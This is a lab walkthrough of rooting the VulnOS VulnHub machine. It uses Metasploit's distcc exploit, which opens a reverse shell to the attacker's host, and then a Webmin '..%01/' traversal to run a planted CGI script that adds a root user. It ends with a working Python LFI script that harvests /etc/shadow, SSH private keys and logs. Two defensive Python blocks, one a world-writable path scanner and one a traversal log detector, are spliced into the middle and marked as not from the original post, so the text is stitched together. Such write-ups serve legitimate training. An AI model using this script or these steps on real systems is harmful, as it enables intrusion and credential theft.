Hello Friends
This solution belongs to VulnOs VM from vulnhub. Hope you'll enjoy it.
So we start with basic nmap scan:-
22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (Ubuntu Linux; protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.7.0-P1
80/tcp open http Apache httpd 2.2.14 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
901/tcp open http Samba SWAT administration server
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
2000/tcp open sieve Dovecot timsieved
2049/tcp open nfs 2-4 (RPC #100003)
3306/tcp open mysql MySQL 5.1.73-0ubuntu0.10.04.1
3632/tcp open distccd distccd v1 ((Ubuntu 4.4.3-4ubuntu5.1) 4.4.3)
6667/tcp open irc IRCnet ircd
8070/tcp open unknown
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
10000/tcp open http MiniServ 0.01 (Webmin httpd)
41120/tcp open nlockmgr 1-4 (RPC #100021)
48389/tcp open status 1 (RPC #100024)
59544/tcp open mountd 1-3 (RPC #100005)

After spending enough time around the services and trying to exploit them, I succeeded in exploiting the "distccd" service hosted on port 3632.
Searching for an exploit for this service brings us to a Metasploit module: exploit/unix/misc/distcc_exec
Set up the RHOST IP address and fire up the exploit.
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NsD30rklVB230mY4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NsD30rklVB230mY4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 5 opened (192.168.1.11:4444 -> 192.168.1.6:45453) at 2016-10-23 17:45:45 +0530
tty
not a tty
The shell is not a tty, so spawn one, if only for eye-candy's sake:-
python -c 'import pty;pty.spawn("/bin/sh");'
$ tty
tty
/dev/pts/2
Dirbuster had given a handful of results, but none of them seemed worth using except one hint (cgi-bin).
Browsing through /var/www, the following applications are found hosted, a pretty large number:

$ ls /var/www/
DVWA-1.0.8 imgs mutillidae redmine-0.9.6
Hackademic_Challenges[EN] index.html openclinic tikiwiki-1.7.9
dolibarr-3.0.0 index2.html phpsysinfo webERP
egroupware insecure postfixadmin-2.3.1 webmin-1.280

There is a webmin application; everyone is very fond of it ;) So let's find out what privileges it holds.

$ ps aux | grep webmin
root 1892 0.0 0.9 6736 4676 ? Ss 10:28 0:00 /usr/bin/perl /var/www/webmin-1.280

Excellent, so now we know that webmin runs as root and can be used for rooting purposes.
Let's browse through the cgi-bin files.

$ cd /usr/lib/cgi-bin
$ ls
nagios3 php php5

Let's check the permissions for cgi-bin:

$ ls -l ../ | grep cgi-bin
drwxrwxrwx 3 root root 4096 Oct 23 11:05 cgi-bin

777 permissions are very rewarding permissions.
Now create a cgi script to add a root user-
So here we try to create a user "superb" with password "superbpass" as a super user with this script. Just make sure that this script has executable permissions.
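As a defender's check for the 777 cgi-bin finding above (any local user can drop a script there that a root-owned Webmin process will later execute), here is an added example, not from the original post, that walks a web-served tree and reports world-writable, non-sticky entries. It runs against a constructed temporary fixture rather than the VM's real filesystem; the directory names are assumptions.

```python
import os
import stat
import tempfile

def world_writable_entries(root):
    """Walk `root` and return (relative path, octal mode) for every directory or
    regular file that any local user may write to: others-write bit set, and for
    directories no sticky bit (a sticky /tmp-style dir is a weaker finding)."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode) or not st.st_mode & stat.S_IWOTH:
                continue
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
                continue
            findings.append((os.path.relpath(full, root), oct(stat.S_IMODE(st.st_mode))))
    return sorted(findings)

def demo():
    """Constructed fixture (not the VM): a 777 cgi-bin next to a 755 html dir and
    a sticky 1777 scratch dir, with a 755 script inside cgi-bin."""
    root = tempfile.mkdtemp()
    for name, mode in (("cgi-bin", 0o777), ("html", 0o755), ("scratch", 0o1777)):
        path = os.path.join(root, name)
        os.mkdir(path)
        os.chmod(path, mode)          # chmod after mkdir so the umask does not interfere
    script = os.path.join(root, "cgi-bin", "shell.cgi")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\n")       # placeholder content only
    os.chmod(script, 0o755)
    return world_writable_entries(root)

if __name__ == "__main__":
    for path, mode in demo():
        print("world-writable: %s (%s)" % (path, mode))
```

Only the 777 cgi-bin directory is reported; the sticky scratch directory and the 755 script are not.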
Now all we need is to run this script as the root user. So we search for webmin-1.280 exploits; Metasploit has one.
But I didn't want to depend on metasploit once again. So I look through the exploit's code.

msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin File Disclosure
exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Webmin /file/show.cgi Remote Command Execution

The relevant part of the module's code (excerpt):

def run
  print_status("Attempting to retrieve #{datastore['RPATH']}...")
  dir = normalize_uri(datastore['DIR'])
  uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])
The variable "dir" has the value "unauthenticated", and the exploit uses 40 directory traversals to get the file specified in "RPATH". So let's check at what depth webmin breaks. I created a python script to check for LFI. BTW, there is a perl exploit for this too.
Well, the "re" module didn't get used in the script. Here I iterate through a loop from 1 to 50 for directory traversal using "..%01/".
And guess what, webmin broke at the 4th iteration. Hell
So, we can use this script to execute our cgi script.
Make the necessary changes to the file path on webmin. We need to run the shell.cgi file located in the /usr/lib/cgi-bin directory.
Now run the script.
Since I knew that the script gets the job done in 4 iterations, I didn't wait for more than that. Now it's time to check the passwd file.
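As the defender's counterpart to the probe above, here is an added example, not from the original post, that parses Apache-style access log lines and flags the repeated "..%01/" traversal the module relies on, reporting the hop count, whether a control byte was used, and whether the requested target is a .cgi that would be executed rather than read. The log lines, hosts and timestamps are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style (combined format) log lines; hosts and timestamps are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [23/Oct/2016:17:50:01 +0530] "GET /unauthenticated/..%01/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1523 "-" "Python-urllib/2.7"
192.0.2.10 - - [23/Oct/2016:17:50:02 +0530] "GET /unauthenticated/..%01/..%01/..%01/..%01/usr/lib/cgi-bin/shell.cgi HTTP/1.1" 200 0 "-" "Python-urllib/2.7"
192.0.2.11 - - [23/Oct/2016:17:51:00 +0530] "GET /session_login.cgi HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
192.0.2.12 - - [23/Oct/2016:17:52:00 +0530] "GET /unauthenticated/style.css HTTP/1.1" 200 880 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# One traversal hop after URL decoding: ".." optionally followed by a control byte
# (the ..%01 trick the module relies on) and then a slash. Plain "../" matches too.
HOP_RE = re.compile(r'\.\.[\x00-\x1f]?/')

def analyze_request(line):
    """Return a finding for a traversal attempt, or None for an ordinary request."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    decoded = unquote(m.group('path'))      # %01 -> \x01, %2e -> '.', etc.
    hops = HOP_RE.findall(decoded)
    if not hops:
        return None
    target = HOP_RE.split(decoded)[-1]      # path requested beyond the traversal
    return {
        'ip': m.group('ip'),
        'status': int(m.group('status')),
        'unauthenticated_dir': decoded.startswith('/unauthenticated/'),
        'depth': len(hops),
        'control_byte': any(len(h) == 4 for h in hops),
        'target': target,
        'executes_cgi': target.endswith('.cgi'),
    }

def scan_log(text):
    """All traversal findings in a log, in file order."""
    return [f for f in map(analyze_request, text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(ip)s depth=%(depth)d ctrl=%(control_byte)s target=%(target)s cgi=%(executes_cgi)s" % f)
```

A 200 status on a traversal request with executes_cgi set is the signal that the script in cgi-bin actually ran, which is the event worth alerting on.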
Superb :) so "superb" is now a new user. Let's switch to it.
Hahaha, Game Over buddy.
There are many other vulnerabilities too, like phpmyadmin (guessable password), DVWA, etc... You can hit them one by one.
Hope you guys enjoyed the show ;)
EDIT: Below is the modified LFI script, which will try to read other possibly important files too. If you know of any other important files that are not included here, please post the names.
# Python 2 script (urllib2, print statements).
import urllib2, time

# Files worth trying once the working traversal depth has been found.
testers = ['etc/passwd','etc/shadow','etc/issue','etc/profile','etc/services','/proc/version','proc/self/environ','var/log/apache2/access.log','var/log/apache/access.log','var/log/httpd/access','var/log/apache2/access_log','var/log/apache/access.log','var/log/apache/access_log','var/log/httpd/access_log','apache/logs/access','apache/logs/access_log','apache2/logs/access','apache2/logs/access_log','etc/httpd/logs/access_log','etc/httpd/logs/access','var/httpd/logs/access_log','var/httpd/logs/access.log','var/httpd/logs/access','var/www/logs/access_log','var/www/logs/access','usr/local/apache/logs/access_log','usr/local/apache/logs/access.log','usr/local/apache/logs/access','usr/local/apache2/logs/access_log','usr/local/apache2/logs/access.log','usr/local/apache2/logs/access','var/log/access_log','var/log/access','logs/access','logs/access_log','logs/access_log','opt/lampp/logs/access_log','opt/lampp/logs/access.log','opt/lampp/logs/access','opt/xampp/logs/access','opt/xampp/logs/access_log','opt/xampp/logs/access.log','var/log/dmesg','var/log/auth','var/log/auth.log','var/log/secure','etc/crontab','etc/cron*','etc/network/interfaces','etc/resolv.conf','etc/sysconfig/network','etc/networks','etc/sudoers','var/apache2/config.inc','var/lib/mysql/mysql/user.MYD','/root/anaconda-ks.cfg','var/mail/root','/var/spool/mail/root','etc/ssh/ssh_config','etc/ssh/sshd_config','etc/ssh/ssh_host_dsa_key.pub','etc/ssh/ssh_host_dsa_key','etc/ssh/ssh_host_rsa_key.pub','etc/ssh/ssh_host_rsa_key','etc/ssh/ssh_host_key.pub','etc/ssh/ssh_host_key','etc/fstab','etc/group','etc/sysconfig/network','etc/at.allow','etc/at.deny','etc/cron.allow','etc/cron.deny','etc/crontab','etc/anacrontab','var/spool/cron/crontabs/root','etc/syslog.conf','etc/chttp.conf','etc/lighttpd.conf','etc/cups/cupsd.conf','etc/inetd.conf','etc/apache2/apache2.conf','etc/my.conf','etc/httpd/conf/httpd.conf','opt/lampp/etc/httpd.conf','php://input']

# Base URL; the traversal prefix and target file are appended in connect().
address = "http://192.168.1.4/index1.php?help=true&connect="  # FOR THE LATEST APPLICATION I TESTED
#address = "http://192.168.1.3:10000/unauthenticated/" + "..%01/"*i + "etc/shadow"  # FOR WEBMIN
#address = "http://192.168.1.3:10000/unauthenticated/" + "..%01/"*i + "usr/lib/cgi-bin/shell.cgi"  # FOR WEBMIN

def connect():
    # Try deeper and deeper traversals until the passwd file is returned.
    for i in range(0, 50, 1):
        iterate = "../" * i
        if (i == 0):
            iterate = "/"
        url = address + iterate + "etc/passwd"
        print "***** URL= ", url, "\n"
        print "[+][+] ", url
        try:
            res = urllib2.urlopen(url).read()
            # A passwd file always contains shell paths; weaker checks are left commented out.
            if ("/bin/" in res):
            #if ("root" in res):
            #if (":" in res):
                print "\n[+][+] Passwd file found at ", i, " iteration\n"
                raw_input("Press Enter...")
                print res
                choice = raw_input("\n[+][+] Do you want to look into other standard files? Press 'y' ..")
                if (choice == 'y' or choice == 'Y'):
                    # Reuse the depth that worked for every candidate file.
                    for item in testers:
                        url = address + iterate + item
                        print url
                        res = urllib2.urlopen(url).read()
                        print res
                        raw_input("\n[+][+]Press enter...\n")
                else:
                    print "You didn't press 'y' or 'Y'. Exiting the script...GoodBye\n"
                break
        except Exception, err:
            print "Exception occured, continuing.."
        time.sleep(0.5)
        print "[+][+] LOOP NUMBER- ", i

connect()